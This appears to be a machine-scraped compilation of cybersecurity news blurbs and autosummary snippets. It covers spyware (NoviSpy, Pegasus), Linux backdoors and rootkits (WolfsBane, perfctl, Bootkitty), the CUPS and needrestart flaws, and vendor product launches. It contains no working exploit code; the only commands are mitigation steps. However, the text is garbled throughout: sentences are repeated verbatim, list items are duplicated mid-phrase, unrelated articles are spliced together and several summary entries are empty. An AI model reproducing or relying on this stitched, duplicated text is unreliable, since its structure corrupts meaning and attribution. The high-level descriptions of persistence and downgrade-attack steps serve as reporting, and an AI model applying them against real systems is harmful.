Second, the analysis revealed a previously undetected spyware, named “NoviSpy,” which can extract personal data, activate the device’s microphone or camera, and was installed during police possession of his phone. “Serbian police and intelligence authorities are using advanced phone spyware alongside mobile phone forensic products to unlawfully target journalists, environmental activists and other individuals in a covert surveillance campaign, a new Amnesty International report has revealed.” reported Amnesty International. “Serbia’s police said in a statement that the Amnesty report is “absolutely incorrect,” but also added that “the forensic tool is used in the same way by other police forces around the world.”” reported the Associated Press. "Seal Security launched Seal OS, a solution designed to automatically fix vulnerabilities in both Linux operating systems and application code. Seal OS delivers long-term support for a wide range of Linux distributions, encompassing Red Hat Enterprise Linux, CentOS, Oracle Linux, Debian, Ubuntu, Alpine and more. This support extends to various deployment models, including containers, virtual machines, and bare metal installations. By addressing 99% of Linux vulnerabilities and application code issues, Seal OS provides a solution … More
The post Seal OS fixes vulnerabilities in Linux operating systems appeared first on Help Net Security.
"Autosummary:
Seal OS delivers long-term support for a wide range of Linux distributions, encompassing Red Hat Enterprise Linux, CentOS, Oracle Linux, Debian, Ubuntu, Alpine and more. "Autosummary:
Once launched with root privileges, it proceeds to install a malicious library implant named "libcext.so.2," copies and renames itself to /var/log/cross/auto-color, and makes modifications to "/etc/ld.preload" for establishing persistence on the host. "Autosummary:
" If the malware runs with root privileges, it installs a malicious library implant (libcext.so.2), disguised as the legitimate libcext.so.0 library, copies itself to a system directory (/var/log/cross/auto-color), and modifies "/etc/ld.preload" to ensure the implant executes before any other system library. "Autosummary:
This includes Wi-Fi network information, screenshots, location, iCloud Keychain, sound recordings, photos, browser history, contacts, call history, and SMS messages, and data from various apps like Files, LINE, Mail Master, Telegram, Tencent QQ, WeChat, and WhatsApp. "Autosummary:
This week"s list includes — CVE-2025-24989 (Microsoft Power Pages), CVE-2025-23209 (Craft CMS), CVE-2024-12284 (Citrix NetScaler Console and NetScaler Agent), CVE-2025-26465, CVE-2025-26466 (OpenSSH), CVE-2025-21589 (Juniper Networks Session Smart Router), CVE-2024-12510, CVE-2024-12511 (Xerox VersaLink C7025 Multifunction printer), CVE-2025-0366 (Jupiter X Core plugin), CVE-2024-50379, CVE-2024-56337, CVE-2024-52316, CVE-2024-50379, CVE-2024-56337 (Atlassian), CVE-2024-53900, CVE-2025-23061 (Mongoose library), CVE-2025-26776 (NotFound Chaty Pro plugin), CVE-2025-26763 (MetaSlider Responsive Slider by MetaSlider plugin), CVE-2024-54756 (ZDoom Team GZDoom), CVE-2024-57401 (Uniclare Student Portal), CVE-2025-20059 (Ping Identity PingAM Java Policy Agent), CVE-2025-0868 (DocsGPT), CVE-2025-1023, CVE-2025-1132, CVE-2025-1133, CVE-2025-1134, CVE-2025-1135 (ChurchCRM), CVE-2024-57045 (D-Link DIR-859 router), CVE-2024-57050 (TP-Link WR840N v6 router), CVE-2024-57049 (TP-Link Archer c20 router), CVE 2025-26794 (Exim), CVE-2024-50608, CVE-2024-50609 (Fluent Bit), CVE-2024-54961 (Nagios XI), CVE-2025-23115, and CVE-2025-23116 (Ubiquiti UniFi Protect Camera)."The new confirmed detections, involving known variants of Pegasus from 2021-2023, include attacks against users across government, finance, logistics, and real estate industries," iVerify said, adding in about half the cases, the victims did not receive any Threat Notifications from Apple."The new confirmed detections, involving known variants of Pegasus from 2021-2023, include attacks against users across government, finance, logistics, and real estate industries," iVerify said, adding in about half the cases, the victims did not receive any Threat Notifications from Apple.The spyware, codenamed Spyrtacus, can steal text messages, instant messaging chats, contacts, call logs, ambient audio, and images, among others.The spyware, codenamed Spyrtacus, can steal text messages, instant messaging chats, contacts, call logs, ambient audio, and images, among others.Winnti Stages RevivalStone Campaign Targeting Japan — Winnti, a subgroup with the APT41 Chinese threat activity cluster, targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024 that delivered a wide range of malware, including a rootkit that"s capable of intercepting TCP/IP Network Interface, as well as creating covert channels with infected endpoints within the intranet.This included a network likely originating from China that used its artificial intelligence (AI) models to develop a suspected surveillance tool that"s designed to ingest and analyze posts and comments from platforms such as X, Facebook, YouTube, Instagram, Telegram, and Reddit.This included a network likely originating from China that used its artificial intelligence (AI) models to develop a suspected surveillance tool that"s designed to ingest and analyze posts and comments from platforms such as X, Facebook, YouTube, Instagram, Telegram, and Reddit.Two Estonian Nationals Plead Guilty in $577M Cryptocurrency Fraud Scheme — Two Estonian nationals, Sergei Potapenko and Ivan Turõgin, both 40, have pleaded guilty for the operation of a massive, multi-faceted cryptocurrency Ponzi scheme that claimed hundreds of thousands of people from across the world, including in the U.S. — Two Estonian nationals, Sergei Potapenko and Ivan Turõgin, both 40, have pleaded guilty for the operation of a massive, multi-faceted cryptocurrency Ponzi scheme that claimed hundreds of thousands of people from across the world, including in the U.S. 📰 Around the Cyber World U.S. Army Soldier Pleads Guilty to AT&T and Verizon Hacks — Cameron John Wagenius (aka Kiberphant0m), a 20-year-old U.S. Army soldier, who was arrested early last month over AT&T and Verizon hacking, has pleaded guilty to two counts of unlawful transfer of confidential phone records information in 2024.The incident makes it the biggest-ever cryptocurrency heist reported to date, dwarfing that of Ronin Network ($624 million), Poly Network ($611 million), and BNB Bridge ($586 million). "Kunai is an open-source tool that provides deep and precise event monitoring for Linux environments. “What sets Kunai apart is its ability to go beyond simple event generation. While most security monitoring tools rely on syscalls or kernel function hooking, Kunai takes a more advanced approach by correlating events on the host and providing enriched insights. This means fewer but more meaningful events, reducing noise and the strain on log ingestion while delivering deeper visibility … More
The post Kunai: Open-source threat hunting tool for Linux appeared first on Help Net Security.
"Autosummary:
Plus, it seamlessly integrates with other open-source tools, supporting YARA rules for file scanning and connecting to MISP for real-time IoC scanning: ensuring security teams have the flexibility and power they need,” Jerome explained. "Autosummary:
"While the REF7707 campaign is characterized by a well-engineered, highly capable, novel intrusion set, the campaign owners exhibited poor campaign management and inconsistent evasion practices," security researchers Andrew Pease and Seth Goodwin said in a technical analysis. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"CyberArk announced Identity Bridge, an endpoint identity security capability that will support identity and privilege sprawl reduction on Linux machines. Identity Bridge will enable organizations to authenticate to Linux systems using centralized accounts, minimizing dependence on outdated authentication methods. This helps modernize Identity and Access Management (IAM) without leaving Linux environments behind. Like all critical IT infrastructure, Linux systems are prime targets for cyberattacks, particularly via identity compromise. Managing identity and access on Linux systems … More
The post CyberArk Identity Bridge manages user access and authentication for Linux environments appeared first on Help Net Security.
"Autosummary:
“Being able to manage user authentication and authorization across the entire IT infrastructure from a single, centralized location is a must to avoid identities and permissions sprawl, privilege escalation challenges, and excessive management overhead,” said Peretz Regev, CPO, CyberArk. "Cisco announced Cisco AI Defense, a pioneering solution to enable and safeguard AI transformation within enterprises. As AI technology advances, new safety concerns and security threats are emerging at an unprecedented speed which existing security solutions are unprepared to protect against. Cisco AI Defense is purpose-built for enterprises to develop, deploy and secure AI applications with confidence. “Business and technology leaders can’t afford to sacrifice safety for speed when embracing AI,” said Jeetu Patel, EVP and … More
The post Cisco AI Defense safeguards against the misuse of AI tools appeared first on Help Net Security.
"Autosummary:
Accuracy and trustworthiness are essential for protecting enterprise AI applications, and Cisco has been actively involved in developing AI security industry standards, including those from MITRE, OWASP, and NIST.AI Defense integrates seamlessly with existing data flows for unparalleled visibility and control and is built into the Security Cloud, Cisco’s unified, AI-driven, cross-domain security platform. Securing access to AI applications: As end users rush to adopt AI applications like summarization tools to improve their productivity, security teams need to prevent data leakage and the poisoning of proprietary data. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: MUT-1244 targeting security researchers, red teamers, and threat actors A threat actor tracked as MUT-1244 by DataDog researchers has been targeting academics, pentesters, red teamers, security researchers, as well as other threat actors, in order to steal AWS access keys, WordPress account credentials and other sensitive data. Kali Linux 2024.4 released! 14 new shiny tools added Kali Linux 2024.4 includes … More
The post Week in review: MUT-1244 targets both security workers and threat actors, Kali Linux 2024.4 released appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: MUT-1244 targeting security researchers, red teamers, and threat actors A threat actor tracked as MUT-1244 by DataDog researchers has been targeting academics, pentesters, red teamers, security researchers, as well as other threat actors, in order to steal AWS access keys, WordPress account credentials and other sensitive data. Balancing security and user experience to improve fraud prevention strategies In this Help Net Security interview, Jennifer White, Senior Director for Banking and Payments Intelligence at J.D. Power, discusses how financial institutions can improve customer satisfaction during fraud resolution, covering proactive fraud prevention, clear communication, and empathetic issue resolution. "Kali Linux 2024.4 includes a broad set of updates and changes. The summary of the changelog since the 2024.3 release from September: Python 3.12 – New default Python version (Au revoir pip, hello pipx). The end of the i386 kernel and images – Farewell x86 (images), but not goodbye (packages). Deprecations in the SSH client: DSA keys – Reminder about using ssh1 if required. Raspberry Pi Imager customizations support: Able to alter settings at write … More
The post Kali Linux 2024.4 released! 14 new shiny tools added appeared first on Help Net Security.
"Autosummary:
Generate username lists for companies on LinkedIn – Generate username lists for companies on LinkedIn mssqlpwner – Interact and pwn MSSQL servers – Interact and pwn MSSQL servers openssh-ssh1 – SSH client for legacy SSH1 protocol – SSH client for legacy SSH1 protocol proximoth – Control frame attack vulnerability detection tool – Control frame attack vulnerability detection tool python-pipx – Execute binaries from Python packages in isolated environments – Execute binaries from Python packages in isolated environments sara – RouterOS Security Inspector – RouterOS Security Inspector web-cache-vulnerability-scanner – Go-based CLI tool for testing for web cache poisoning – Go-based CLI tool for testing for web cache poisoning xsrfprobe – Advanced CSRF/XSRF audit and exploitation toolkit. New Tools in Kali bloodyad – Active Directory privilege escalation framework – Active Directory privilege escalation framework certi – Ask for certificates to ADCS and discover templates – Ask for certificates to ADCS and discover templates chainsaw – Search and hunt through Windows forensic artefacts – Search and hunt through Windows forensic artefacts findomain – Complete solution for domain recognition – Complete solution for domain recognition linkedin2username – "Autosummary:
"Autosummary:
Tracked as CVE-2024-35250, this security flaw is due to an untrusted pointer dereference weakness that allows local attackers to gain SYSTEM privileges in low-complexity attacks that don"t require user interaction. "Autosummary:
The fourteen new tools released in this release are: bloodyad - Active Directory privilege escalation framework (Submitted by @Arszilla) certi - Ask for certificates to ADCS and discover templates (Submitted by @Arszilla) chainsaw - Rapidly search and hunt through Windows forensic artefacts (Submitted by @Arszilla) findomain - Fastest and most complete solution for domain recognition (Submitted by @Arszilla) hexwalk - Hex analyzer, editor and viewer linkedin2username - Generate username lists for companies on LinkedIn mssqlpwner - Interact and pwn MSSQL servers openssh-ssh1 - Secure SHell (SSH) client for legacy SSH1 protocol proximoth - Control frame attack vulnerability detection tool (Submitted by @TechnicalUserX) python-pipx - Execute binaries from Python packages in isolated environments sara - RouterOS Security Inspector (Submitted by @casterbyte) web-cache-vulnerability-scanner - Go-based CLI tool for testing for web cache poisoning (Submitted by @Arszilla) xsrfprobe - An advanced Cross Site Request Forgery (CSRF/XSRF) audit and exploitation toolkit. New Kali Linux 2024.4 login theme Source: Kali How to get Kali Linux 2024.4 To start using Kali Linux 2024.4, you can upgrade your existing installation, select a platform, or directly download ISO images for new installs and live distributions. Once done upgrading, you can check if the upgrade was successful by using the following command: grep VERSION /etc/os-release Checking the version of Kali Linux Source: BleepingComputer You can view the complete changelog for Kali 2024.4 on Kali"s website. "Autosummary:
"Autosummary:
The development makes IOCONTROL the tenth malware family to specifically single out Industrial Control Systems (ICS) after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, PIPEDREAM (aka INCONTROLLER), COSMICENERGY, and FrostyGoop (aka BUSTLEBERM) to date. "Autosummary:
It intercepts user-level system calls and alters the behavior of looks like ls, ps, netstat, top, htop, and cat to hide files, processes, and network connections associated with the rootkit It can also dynamically hide any other files and directories based on attacker-defined criteria and make malicious binaries entirely invisible to users and system admins. "Autosummary:
Bootkitty exploits LogoFAIL via tampered BMP files to inject shellcode, bypass Secure Boot, and target specific devices from different manufacturers, including Acer, HP, Fujitsu, and Lenovo. "Autosummary:
Bootkitty attack overview Source: Binarly Impact on specific hardware Binarly says Bootkitty could impact any device that has not been patched against LogoFAIL, but its current shellcode expects specific code used in firmware modules found on Acer, HP, Fujitsu, and Lenovo computers. "QScanner is a Linux command-line utility tailored for scanning container images and performing Software Composition Analysis (SCA). It is compatible with diverse container orchestration systems, container runtimes, and operating systems. QScanner features Instant console results: Scan for vulnerabilities and receive real-time results directly on the console. Integration: Seamlessly integrate QScanner with your CI/CD pipelines and leverage the benefits of security policy-based evaluations. Runtime support: QScanner is compatible with multiple container runtimes enabling flexibility in deployment … More
The post QScanner: Linux command-line utility for scanning container images, conducting SCA appeared first on Help Net Security.
"Autosummary:
"ESET Research has discovered the first UEFI bootkit designed for Linux systems, named Bootkitty by its creators. Researchers believe this bootkit is likely an initial proof of concept, and based on ESET telemetry, it has not been deployed in the wild. Bootkitty execution overview (Source: ESET) However, it is the first evidence that UEFI bootkits are no longer confined to Windows systems alone. The bootkit’s main goal is to disable the kernel’s signature verification feature … More
The post ESET researchers analyze first UEFI bootkit for Linux systems appeared first on Help Net Security.
"Autosummary:
It all started with the first UEFI bootkit proof of concept (PoC), described by Andrea Allievi in 2012, which served as a demonstration of deploying bootkits on modern UEFI-based Windows systems, and was followed with many other PoCs (EfiGuard, Boot Backdoor, UEFI-bootkit). "Autosummary:
"Autosummary:
Next, it hooks various GRUB functions like "start_image" and "grub_verifiers_open" to manipulate the bootloader"s integrity checks for binaries, including the Linux kernel, turning off signature verification. "Autosummary:
“Bootkitty is designed to boot the Linux kernel seamlessly, whether UEFI Secure Boot is enabled or not, as it patches, in memory, the necessary functions responsible for integrity verification before GRUB is executed.” continues the report. "The Kali SOC in AWS project enables the deployment of a Security Operations Center (SOC) in AWS, utilizing the Kali Linux toolset for purple team activities. This environment is ideal for honing skills in security operations, threat detection, incident response, and training scenarios. About the Kali SOC project “I created this project to address the need for accessible and customizable detection and threat hunting labs. People often ask me for advice on building labs, and … More
The post Deploy a SOC using Kali Linux in AWS appeared first on Help Net Security.
"Autosummary:
Furthermore, the project is designed to give users complete control over their lab, making it adaptable for learning, experimentation, or operational use,” Payton explained. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: 2,000 Palo Alto Networks devices compromised in latest attacks Attackers have compromised around 2,000 Palo Alto Networks firewalls by leveraging the two recently patched zero-days (CVE-2024-0012 and CVE-2024-9474), Shadowserver Foundation’s internet-wide scanning has revealed. Researchers unearth two previously unknown Linux backdoors ESET researchers have identified multiple samples of two previously unknown Linux backdoors: WolfsBane and FireWood. ScubaGear: Open-source tool to … More
The post Week in review: 0-days exploited in Palo Alto Networks firewalls, two unknown Linux backdoors identified appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: November 22, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Aon, Arkose Labs, HiddenLayer, Hornetsecurity, Radware, and Tanium. Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) Apple has released emergency security updates for macOS Sequoia that fix two zero-day vulnerabilities (CVE-2024-44309, CVE-2024-44308) that “may have been actively exploited on Intel-based Mac systems”. "Autosummary:
China-linked APT Gelsemium uses a new Linux backdoor dubbed WolfsBane Pierluigi Paganini November 23, 2024 November 23, 2024 China-linked APT Gelsemium has been observed using a new Linux backdoor dubbed WolfsBane in attacks targeting East and Southeast Asia.“Consequently, threat actors are exploring new attack avenues, with a growing focus on exploiting vulnerabilities in internet-facing systems, most of which run on Linux.” "ESET researchers have identified multiple samples of two previously unknown Linux backdoors: WolfsBane and FireWood. The goal of the backdoors and tools discovered is cyberespionage that targets sensitive data such as system information, user credentials, and specific files and directories. These tools are designed to maintain persistent access and execute commands stealthily, enabling prolonged intelligence gathering while evading detection. WolfsBane execution chain (Source: ESET) WolfsBane Researchers discovered the WolfsBane samples at VirusTotal, uploaded from Taiwan, … More
The post Researchers unearth two previously unknown Linux backdoors appeared first on Help Net Security.
"Autosummary:
WolfsBane Researchers discovered the WolfsBane samples at VirusTotal, uploaded from Taiwan, the Philippines, and Singapore, likely originating from an incident response on a compromised server. "Autosummary:
"Autosummary:
WolfsBane"s execution flow Source: ESET Finally, a modified version of the BEURK userland rootkit is loaded via "/etc/ld.so.preload" for system-wide hooking to help hide processes, files, and network traffic related to WolfsBane"s activities. "Autosummary:
These are the descriptions for the flaws: CVE-2024-48990 (CVSS score: 7.8) – A vulnerability that allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable. "Autosummary:
The five flaws are listed below - CVE-2024-48990 (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable CVE-2024-48991 (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by winning a race condition and tricking needrestart into running their own, fake Python interpreter (CVSS score: 7.8) - A vulnerability that allows local attackers to execute arbitrary code as root by winning a race condition and tricking needrestart into running their own, fake Python interpreter CVE-2024-48992 (CVSS score: 7.8) - "Oracle Linux offers a secure, streamlined platform for deploying and managing applications across on-premises, cloud, and edge environments. Designed for demanding workloads, it includes tools for automation, virtualization, high availability, cloud-native development, Kubernetes, and more. Oracle Linux, 9 Update 5 for the 64-bit Intel and AMD (x86_64) and 64-bit Arm (aarch64) platforms is now generally available. This release is packaged with the following kernel options: Unbreakable Enterprise Kernel (UEK) Release 7 Update 3, 5.15.0-302.167.6 for … More
The post Oracle Linux 9 Update 5 brings security updates, OpenJDK 17, .NET 9.0 appeared first on Help Net Security.
"Autosummary:
This release is packaged with the following kernel options: Unbreakable Enterprise Kernel (UEK) Release 7 Update 3, 5.15.0-302.167.6 for the x86_64 and aarch64 platforms Red Hat Compatible Kernel (RHCK), 5.14.0-503.11.1 for the x86_64 platform Security OpenSSL updated to version 3.2.2 – This significant update includes enhanced cryptographic operations and optimized RSA public key handling. "Autosummary:
The flaws were discovered by Qualys and are tracked as CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003. Needrestart is a utility commonly used on Linux, including on Ubuntu Server, to identify services that require a restart after package updates, ensuring that those services run the most up-to-date versions of shared libraries. "AlmaLinux is a free, open-source, enterprise-grade Linux distribution. Governed and owned by the community, it offers a production-ready platform with binary compatibility to Red Hat Enterprise Linux. AlmaLinux 9.5, codenamed Teal Serval, is now available. Security updates: The OpenSSL TLS toolkit is upgraded to version 3.2.2. OpenSSL now supports certificate compression extension (RFC 8879) and Brainpool curves have been added to the TLS 1.3 protocol (RFC 8734). The SELinux policy now provides a boolean that … More
The post AlmaLinux 9.5 released: Security updates, new packages, and more! appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Truesec, in an analysis published earlier this month, detailed Helldown attack chains that have been observed making use of internet-facing Zyxel firewalls to obtain initial access, followed by carrying out persistence, credential harvesting, network enumeration, defense evasion, and lateral movement activities to ultimately deploy the ransomware. Interlock is assessed to be a new group that sprang forth from Rhysida operators or developers, the company added, citing overlaps in tradecraft, tools, and ransomware behavior. "Microsoft has announced the Windows Resiliency Initiative, aimed at avoiding a repeat of the prolonged worldwide IT outage caused by a buggy CrowdStrike update that took down millions of Windows machines and rendered them remotely unfixable. As part of that initiative, the company has announced that its working on Quick Machine Recovery, a feature that “will enable IT administrators to execute targeted fixes from Windows Update on PCs, even when machines are unable to boot, … More
The post Microsoft plans to boot security vendors out of the Windows kernel appeared first on Help Net Security.
"Autosummary:
"Red Hat announced Red Hat Enterprise Linux 9.5. Red Hat Enterprise Linux helps organizations deploy applications and workloads more quickly and with greater reliability, enabling them to lower costs and more effectively manage workloads across hybrid cloud deployments while mitigating IT risks, from the datacenter to public clouds to the edge. According to IDC, “Organizations continue to find themselves at odds with striking the balance between maintaining their Linux operating system environments and the workloads … More
The post Red Hat Enterprise Linux 9.5 helps organizations simplify operations appeared first on Help Net Security.
"Autosummary:
In addition, Red Hat Enterprise Linux 9.5 now offers new file management capabilities to the web console, allowing users to perform routine file management tasks without using the command line, such as browsing the file system, uploading and downloading files, changing permissions and creating directories.They further called out the value of automation, better scalability and access to Red Hat Enterprise Linux expertise,” said Greg Macatee, research manager, Infrastructure Software Platforms, Worldwide Infrastructure Research, IDC. "Autosummary:
" The activity, which has mainly targeted countries like Romania, Poland, Germany, and Kazakhstan, starts with a batch file present within the archive file. "Unknown attackers are trying to trick Windows users into spinning up a custom Linux virtual machine (VM) with a pre-configured backdoor, Securonix researchers have discovered. The campaign The attack began with a phishing email, they believe, but they weren’t able to pinpoint the intendend victims. The email included a link pointing to an unusually big ZIP file (285 MB), and its name – OneAmerica Survey.zip – points to the likely lure: a survey by OneAmerica … More
The post Beware of phishing emails delivering backdoored Linux VMs! appeared first on Help Net Security.
"Autosummary:
If the user clicks on the shortcut file, a process is started wherein: The ZIP file is “unzipped” and its contents put into the user’s profile directory into a directory called “datax” A batch processing (BAT) file is executed and it shows a decoy image saying there was an “Internal Server Error” while, in the background, a (renamed) QEMU process and command line is executed to start the emulated Tiny Core Linux environment The customized Linux VM is meant to be used to create an interactive shell (essentially, a backdoor) on the host machine by initiating an SSH connection, through which the attackers can: "Autosummary:
Start.bat batch file installing the QEMU Linux virtual machine Source: BleepingComputer While the virtual machine is being installed, the same batch file will display a PNG file downloaded from a remote site that shows a fake server error as a decoy, implying a broken link to the survey. "OpenPaX is an open-source kernel patch that mitigates common memory safety errors, re-hardening systems against application-level memory safety attacks using a simple Linux kernel patch. It’s available under the same GPLv2 license terms as the Linux kernel. “We are pleased to be able to bring this to the industry at large and as an integrated offering for our customers with Edera Protect,” said Ariadne Conill, distinguished engineer at Edera and maintainer of Alpine Linux. “Until … More
The post OpenPaX: Open-source kernel patch that mitigates memory safety errors appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Ultimately, the exploitation steps an attacker needs to follow are below - Turning off VBS in the Windows Registry, or invalidating SecureKernel.exe Downgrading ci.dll to the unpatched version Restarting the machine Exploiting ItsNotASecurityBoundary DSE bypass to achieve kernel-level code execution The only instance where it fails is when VBS is turned on with a UEFI lock and a "Mandatory" flag, the last of which causes boot failure when VBS files are corrupted. "Autosummary:
"I was able to make a fully patched Windows machine susceptible to past vulnerabilities, turning fixed vulnerabilities unfixed and making the term “fully patched” meaningless on any Windows machine in the world" - Alon Leviev Despite kernel security improving significantly over the years, Leviev managed to bypass the Driver Signature Enforcement (DSE) feature, showing how an attacker could load unsigned kernel drivers to deploy rootkit malware that disables security controls and hides activity that could lead to detecting the compromise. "Autosummary:
The vulnerabilities impact Intel"s 12th, 13th, and 14th chip generations for consumers and the 5th and 6th generation of Xeon processors for servers, along with AMD"s Zen 1, Zen 1+, and Zen 2 processors. "Autosummary:
There are six key LLM (Large Language Model) components that can be targeted by attackers: Prompt - Attacks like prompt injections, where malicious input is used to manipulate the AI"s output Response - Misuse or leakage of sensitive information in AI-generated responses Model - Theft, poisoning, or manipulation of the AI model Training Data - Introducing malicious data to alter the behavior of the AI. Using AI to Abuse AI: Introducing GPTs GPTs, introduced by OpenAI on November 6, 2023, are customizable versions of ChatGPT that allow users to add specific instructions, integrate external APIs and incorporate unique knowledge sources. OpenAI protection AI Attacks and Risks There are multiple frameworks existing today to assist organizations that are considering developing and creating AI-based software: NIST Artificial Intelligence Risk Management Framework Google"s Secure AI Framework OWASP Top 10 for LLM OWASP Top 10 for LLM Applications The recently launched MITRE ATLAS LLM Attack Surface "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-30088 (CVSS score 7.0) Microsoft Windows Kernel TOCTOU Race Condition Vulnerability CVE-2024-9680 Mozilla Firefox Use-After-Free Vulnerability CVE-2024-28987 (CVSS score 9.1) "Autosummary:
"Autosummary:
In October 2018, the US-CERT released a joint technical alert from the DHS, the FBI, and the Treasury warning about the ATM cash-out scheme, dubbed “FASTCash,” being used by the prolific North Korean APT hacking group known as Hidden Cobra (aka Lazarus Group and Guardians of Peace). "Autosummary:
Once the manipulated message is sent back to the bank"s central systems containing the approval codes (DE38, DE39) and the amount (DE54), the bank approves the transaction, and a money mule acting on behalf of the hackers withdraws the cash from an ATM. "Autosummary:
"Canonical released Ubuntu 24.10 Oracular Oriole, which brings notable advancements, including an updated kernel, new toolchains, and the GNOME 47 desktop environment, along with significant enhancements in software security. “Oracular Oriole sets a new pace for delivering the latest upstream kernel and toolchains,” said Mark Shuttleworth, CEO of Canonical, “Experimental new security features demonstrate our commitment to continually elevate the Linux desktop experience in conversation with the community for the next 20 years and beyond.” … More
The post Ubuntu 24.10 Oracular Oriole brings tighter security controls appeared first on Help Net Security.
"Autosummary:
Expanded toolchain support with versioned Rust and Java TCK Certification Ubuntu 24.10 brings expanded toolchain support, featuring the latest versions of Python, Java, Go, C, C++, Rust, and .Net, with .Net support now extended to the ppc64el architecture. "Autosummary:
The scanner was created by cybersecurity researcher Marcus Hitchins (aka "MalwareTech"), who created the scanner to help system administrators scan their networks and quickly identify devices running vulnerable CUPS-Browsed services. "Thousands of Linux systems are likely infected with the highly elusive and persistent “perfctl” (or “perfcc“) cryptomining malware and many others still could be at risk of getting compromised, Aqua Security researchers revealed last week. “In all the attacks observed, the malware was used to run a cryptominer, and in some cases, we also detected the execution of proxy-jacking software,” they shared. “Perfctl” malware Though the actual cryptomining is performed by XMRIG Monero cryptomining software, … More
The post Linux systems targeted with stealthy “Perfctl” cryptomining malware appeared first on Help Net Security.
"Autosummary:
The “perfctl” attack flow (Source: Aqua Security) The malware: Contains and uses an exploit to CVE-2021-4034 (aka PwnKit) to attempt to gain full root privileges Modifies existing scripts to ensure execution of the malware and suppression of mesg errors (that might point to malicious execution), and drops a binary that verifies the execution of main payload Copies itself from memory to half a dozen other locations (with file names that mimic the names of conventional system files) Drops a rootkit to hide its presence and assure persistence, alter network traffic, etc. "Autosummary:
This data includes host events, locations of the copies of itself, process names, communication logs, tokens, and additional log information.New Perfctl Malware targets Linux servers in cryptomining campaign Pierluigi Paganini October 04, 2024 October 04, 2024 perfctl malware targets misconfigured Linux servers to deploy cryptocurrency miners and proxyjacking software in an ongoing campaign. "Autosummary:
Additional userland rootkits are also deployed, replacing the ldd, top, crontab, and lsof utilities with trojanized versions, again, preventing direct detection of the malware"s activities. Detecting and stopping perfctl Aqua Nautilus proposes several ways for detecting and stopping perfctl, which fall into four main categories: system monitoring, network traffic analysis, file and process integrity monitoring, and proactive mitigation. "Autosummary:
"As an integral part of the Halcyon Anti-Ransomware Platform, Halcyon Linux offers protection against ransomware attacks targeting Linux systems. While ransomware operators were once almost exclusively focused on targeting Windows environments, the introduction of Linux variants represents a significant expansion of the addressable target range. In 2023, Linux-based ransomware attacks increased by 75% yet Linux-based systems and endpoints are often overlooked and without ransomware defenses. “When it comes to ransomware protection, organizations typically prioritize securing … More
The post Halcyon offers ransomware protection for Linux environments appeared first on Help Net Security.
"Autosummary:
"After much hyping and following prematurely leaked information by a third party, security researcher Simone Margaritelli has released details about four zero-day vulnerabilities in the Common UNIX Printing System (CUPS) that can be abused by remote, unauthenticated attackers to achieve code execution on vulnerable Linux and Unix-like sistems. The CUPS vulnerabilities CUPS is an open-source printing system that allows a computer on which is installed to act as a print server. It is developed by … More
The post CUPS vulnerabilities affecting Linux, Unix systems can lead to RCE appeared first on Help Net Security.
"Autosummary:
The vulnerabilities discovered by Margaritelli (aka EvilSocket) affect several CUPS components/packages: CVE-2024-47176 , in the cups-browsed (up to version 2.0.1) helper daemon, which allows attackers to submit packets via the IPP default port (UDP 631) and trick it to request arbitrary, attacker-controlled URLs , in the cups-browsed (up to version 2.0.1) helper daemon, which allows attackers to submit packets via the IPP default port (UDP 631) and trick it to request arbitrary, attacker-controlled URLs CVE-2024-47076 , in libcupsfilters (up to version 2.1b1), which allows attackers to pass malicious data to other CUPS components , in libcupsfilters (up to version 2.1b1), which allows attackers to pass malicious data to other CUPS components CVE-2024-47175 , in libppd (up to version 2.1b1), which allows attackers to inject malicious data in the temporary PPD file to pass to CUPS components , in libppd (up to version 2.1b1), which allows attackers to inject malicious data in the temporary PPD file to pass to CUPS components CVE-2024-47177, in cups-filters (up to version 2.0.1) , which allows attackers to execute arbitrary commands via the FoomaticRIPCommandLine PPD parameter By chaining some of these flaws, “a remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP URLs with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer),” Margaritelli explained. "Autosummary:
The list of vulnerabilities is as follows - CVE-2024-47176 - cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker-controlled URL - cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker-controlled URL CVE-2024-47076 - libcupsfilters <= 2.1b1 "Autosummary:
* Canonical, RedHat and… pic.twitter.com/N2d1rm2VeR — Simone Margaritelli (@evilsocket) September 23, 2024 Information about the Linux vulnerability was leaked on GitHub, for this reason, the Italian researcher decided to release the technical details and published a proof-of-concept (PoC) exploit on September 26, 2024. To stop a running cups-browsed service, an administrator should use the following command: $ sudo systemctl stop cups-browsed The cups-browsed service can also be prevented from starting on reboot with: $ sudo systemctl disable cups-browsed Blocking all traffic to UDP port 631 and DNS-SD traffic can also mitigate attacks. The researcher disclosed four vulnerabilities, tracked as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177, impacting the CUPS (Common UNIX Printing System) open-source printing system. "Autosummary:
